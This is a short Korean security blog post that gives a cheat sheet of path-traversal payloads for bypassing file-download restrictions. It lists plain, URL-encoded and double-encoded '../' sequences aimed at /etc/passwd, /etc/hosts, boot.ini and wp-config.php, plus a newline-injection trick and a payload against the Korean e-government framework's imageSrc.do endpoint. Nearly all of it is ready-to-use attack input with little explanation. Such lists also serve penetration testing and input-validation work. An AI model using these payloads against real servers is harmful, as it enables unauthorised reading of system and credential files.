-
File Download Bypass - 파일 다운로드 우회Security 2022. 7. 25. 09:27
1) 파일 다운로드 경로
../../../../etc/passwd
../../../../etc/hosts
../../../../winnt/win.ini
../../../../boot.ini
../../../../wp-config.php2) 인코딩
../../../../etc/passwd
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64../../../../../../../../../etc/hosts
인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73
더블 인코딩 %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fhosts
3) 전자정부 표준프레임워크 사용
imageSrc.do?path=/....//....//....//....//....//....//....//....//....//....//etc/&physical=passwd
4) 그 외passwd %70%61%73%73%77%64
16bit 유니코드인코딩 .(%u002e), /(%u2215), \(%u2216)
더블URL 인코딩 .(%252e), /(%252f), \(%255c)
유닉스 ../../../../etc/passwd%0a.jpg > 개행문자(%0a)를 삽입 가능
출처 : https://itinformation.tistory.com/
'Security' 카테고리의 다른 글
Linux awk command - 리눅스 awk 명령어 사용법 - Linux 파일 텍스트 데이터 검사, 조작, 출력 (0) 2022.07.25 WIPS (0) 2022.07.25 개인정보 보호법 (0) 2022.06.09 Digital Forensic 2 - 디지털 포렌식 2 (0) 2022.05.23 Digital Forensic - 디지털 포렌식 (0) 2022.05.20